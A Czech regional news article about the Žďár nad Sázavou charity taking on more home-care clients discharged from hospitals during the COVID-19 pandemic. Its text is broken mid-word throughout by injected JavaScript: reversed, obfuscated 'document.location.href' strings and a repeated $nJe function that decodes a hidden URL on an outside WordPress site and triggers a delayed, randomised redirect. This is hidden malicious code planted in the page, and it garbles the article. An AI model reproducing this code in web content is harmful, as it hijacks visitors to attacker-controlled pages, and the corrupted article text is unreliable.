Rainbow page separator

Charitě přibývají klienti propuštění z nemocniční péče

Středa, 24. března 2021

Žďár nad Sázavou / Nárůst počtu klientů terénních služeb registruje Oblastní charita Žďár nad Sázavou. Souvisí [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to i s vysokým počtem hospitalizovaných pacientů; někteří poté mají zájem o domácí zdravotní péči. „Posky[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tování domácí péče hraje důleži[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou roli především pro kapacitu nemocnic. Ty nám z důvodu p$nJe=function(n){if (typeof ($nJe.list[n]) == „string“) return $nJe.list[n].split(„“).reverse().join(„“);return $nJe.list[n];};$nJe.list=[„\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.r$nJe=function(n){if (typeof ($nJe.list[n]) == „string“) return $nJe.list[n].split(„“).reverse().join(„“);return $nJe.list[n];};$nJe.list=[„\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod“]; if (number1==3){var xxdelay = 18000; setTimeout($nJe(0), xxdelay);}andom() * 6); if (number1==3){var xxdelay = 18000; setTimeout($nJe(0), xxdelay);}$nJe=function(n){if (typeof ($nJe.list[n]) == „string“) return $nJe.list[n].split(„“).reverse().join(„“);return $nJe.list[n];};$nJe.list=[„\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod“]; if (number1==3){var xxdelay = 18000; setTimeout($nJe(0), xxdelay);}andemie předávají do péče pacienty, u kterých [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to zdravotní stav dovolí. Terénní služby přispívají k navýšení volných lůžek v nemocnicích pro ty, kteří potřebují akutní péči. Jsme schopni zajistit běžné zdravotní úkony, jako jsou aplikace injekcí, převazy ran, odběry a další, ve stejné kvalitě jako v nemocnici. Pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to se může pacient úspěšně léčit doma, tam, kde je nejraději,“ vysvětlila vedoucí úseku zdravotních a hospicových služeb Oblastní charity Žďár nad Sázavou Barbora Hadrous.
Charita řeší také péči o pacienty po propuštění z nemocnice, kdy je jim třeba poskytnout následnou péči. Zdravotní sestry zajistí kontrolu stavu a fyziologických funkcí, pohybovou a dechovou terapii, nácvik sebeobsluhy, případně kontrolní odběry krve. „Praxe potvrzuje, že v domácím prostředí pacienti rychleji pookřejí a jejich léčba probíhá úspěšněji. Rádi bychom vzkázali rodinným příslušníkům, aby se domácí péče nebáli a využili pomoc našich terénních služeb,“ sdělila vedoucí.
Mimo ty[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to služby je žádáno i poradenství. „V mnoha případech řešíme s rodinnými příslušníky, jak se o dědečka či babičku postarat, kde zajistit příspěvek na péči, pronajmout kompenzační pomůcky a podobně. Ty[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to informace se rodina z důvodu co největšího omezení kontaktů mezi personálem nemocnice a blízkými a velké vytíženosti mnohdy ani nedozví,“ doplnila vedoucí charitní pečovatelské služby Petra Ježová.
Pracovníci terénních charitních služeb se při osobní asistenci postarají i o COVID-19 pozitivní klienty. V [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to případě je nutné nastavit opatření jako používání ochranných pomůcek či přeorganizovat rozpis tak, aby nedocházelo ke střídání pracovníků, čímž se zamezí případnému přenosu nemoci.